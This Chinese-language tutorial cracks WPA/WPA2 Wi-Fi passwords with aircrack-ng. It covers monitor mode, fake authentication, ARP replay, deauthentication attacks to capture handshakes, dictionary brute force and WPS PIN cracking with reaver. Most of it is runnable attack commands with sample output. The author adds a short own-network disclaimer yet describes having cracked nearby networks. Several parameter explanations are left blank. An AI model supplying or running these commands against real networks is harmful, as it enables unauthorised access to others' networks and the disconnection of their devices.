相对于前一段时间脆弱的WEP加密路由器而言,当今的路由器加密方式也大都改变为WPA/WPA2,使得无线路由器的破解难度增加。虽然如此,但还是有很多漏洞层出不穷,如针对路由器WPS的漏洞。退一步来说,即使加密算法无懈可击,我们还可以针对安全防护中最脆弱的部分——人——来进行破解。人的想象力实在是匮乏的很,往往设置密码来来回回就是那么几类,用一个常见的弱口令字典,往往就能在10分钟左右把其密码暴力破解出来。这里提供己种常见的WIFI破解方式,其中WEP破解因为已经过时,所以只是在提到的时候一笔带过,主要记录的是抓握手包然后暴力破解的通用方法,末尾也会提及到WPS的破解方式。注意这仅仅作为个人实验用,最好在自己的家庭网络中测试,以免给别人带来不便。
$ ifconfig -a
这里假设本机MAC地址为:00:11:22:33:44:55
$ airmon-ng start wlan0 [信道号]
其中信道号可以先不填,开启后可以ifconfig看到多了个接口mon0,即为监听接口。值得一提的是,无线网卡的监听模式其实就相当于有线情况下的混杂模式(Promiscuous Mode)。
注: 如果在较新的系统上运行,可能会出现错误"SIOCSIFFLAGS: Name not unique on network”, 这是由于新版的Networkmanager把虚拟的往口mon0也当作硬件设备来管理,导致设备冲突.解决方法有很多:
1.把networkmanager暂时关闭.
$ service network-manager stop
使用完毕之后再打开即可.
2.直接把wlan0网卡设置为monitor模式:
$ ifconfig wlan0 down
$ iwconfig wlan0 mode monitor
$ ifconfig wlan0 up
3.前面两种方式都会使得wlan0网卡变为monitor模式,从而无法上网,如果有多个网卡可以考虑这两种方式. 但是如果之有一个无线网卡,我们可以修改networkmanager的配置使其不管理指定的网络接口,在/etc/NetworkManager/Networkmanager.conf
文件后面加两行:
#avoid conflicts with airmon-ng
[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-name:mon0;interface-name:mon1
然后再和之前一样使用airmon-ng即可.
$ airodump-ng mon0
这条命令会在mon0接口上不断切换信道来搜索附近的wifi热点,在结果中找到待破解的AP,记录BSSID(这里假设为AA:BB:CC:DD:EE:FF),信道号(这里假定为 6),ESSID(设为myWiFi)
$ aireplay-ng -9 -e myWiFi -a AA:BB:CC:DD:EE:FF mon0
其中:
-9
表示注入测试-e
myWiFi 是无线网络名字-a
AA:BB:CC:DD:EE:FF 是接入点的MAC地址mon0
是无线接口名字$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w output mon0
这里值得一提的是,从前为了破解WEP加密的WIFI,我们需要收集足够多的IVS。如果运气好的话,通常40位WEP(64位密钥)用30万IVs就可以破解,104位WEP(128位密钥)有150万IVs可以破解,运气不好的话需要更多。为此我们需要用ARP注入的方式加开扑捉IVs的速度。但对于WPA/WPA2我们则没有类似破解办法,只能通过扑捉握手包来进行暴力破解。 为了AP能够接收packet,源MAC地址必须已经连接。如果你正在注入的源MAC地址没有连接,AP会忽略所有包并发送一个“DeAuthentication“包。这种情况下,不会有新的IVs被创建。缺少和AP的连接是注入失败的一个常见原因,记住:你用来注入的MAC地址必须连接AP(通过虚拟认证或者使用已经连接的客户端MAC) 虚拟认证:
$ aireplay-ng -1 0 -e myWiFi -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 mon0
其中:
成功有类似下面的输出:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
另外还可以:
$ aireplay-ng -1 6000 -o 1 -q 10 -e myWiFi -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 mon0
其中:
成功有类似下面输出:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
airodump抓包速度比较慢,为了加速包的产生,我们可以使用传统的ARP请求重播攻击(ARP request replay attack)来快速生成IVs(Initialization Vectors):
$ aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 mon0
和WEP破解最显著的区别是,由于WPA需要暴力破解,因此抓的包里必须至少包含一个握手包, 我们可以发送一种称之为“Deauth”的数据包来将已连接至无线路由器的合法无线客户端断开,此时客户端就会重新连接无线路由器,我们也就有机会捕获到包含WPA-PSK握手验证的完整数据包了。命令为:
$ aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c clientMAC mon0
其中:
一旦捕捉到WPA handshake,我们就可以开始进行破解了:
$ aircrack-ng -b AA:BB:CC:DD:EE:FF output*.cap -w yourdic
其中:
-b AA:BB:CC:DD:EE:FF
选择了一个我们感兴趣的接入点,这是可选的,因为我们捕捉数据的时候就已经指定了此AP而忽略其他.output*.cap
选择我们在Step5里用airodump抓下来的包.-w
指定一个破解的字典。破解的效率和字典的选择有很大关系,一般选用弱口令字典,因为强口令破解时间太长,得不偿失。许多人家里的WIFI都是常见的格式,车牌、手机、名字、拼音等等,从我破解周围WIFI的结果来看,使用通用的WPA/PSK字典来破解,时间往往不会超过10分钟。这里说点题外话,像用预先计算好的像彩虹表一样的配对表(Pairwise Master Keys)来进行破解也是不行的,因为口令都用ESSID加了盐。所以还是得乖乖抓握手包。
除了这样通用的暴力破解外,我们还可以用reaver来破解带WPS的路由器的PIN码,但是对信号的要求很高,如果AP的信号很强,或者自己的无线网卡很给力,也可以采用这种方式。优点是字典无关,无论路由器密码多强都能破解出来,在我的笔记本上尝试破解了自己家的WIFI密码,花费的时间大概为5个小时。
以上述AP为例,可以用命令行运行
reaver -i mon0 -b AA:BB:CC:DD:EE:FF -a -S -vv -d2 -t 5 -c 1
其中:
示例:
$ reaver -i mon0 -b MAC -a -S –d9 –t9 -vv -c 1
应因状况调整参数: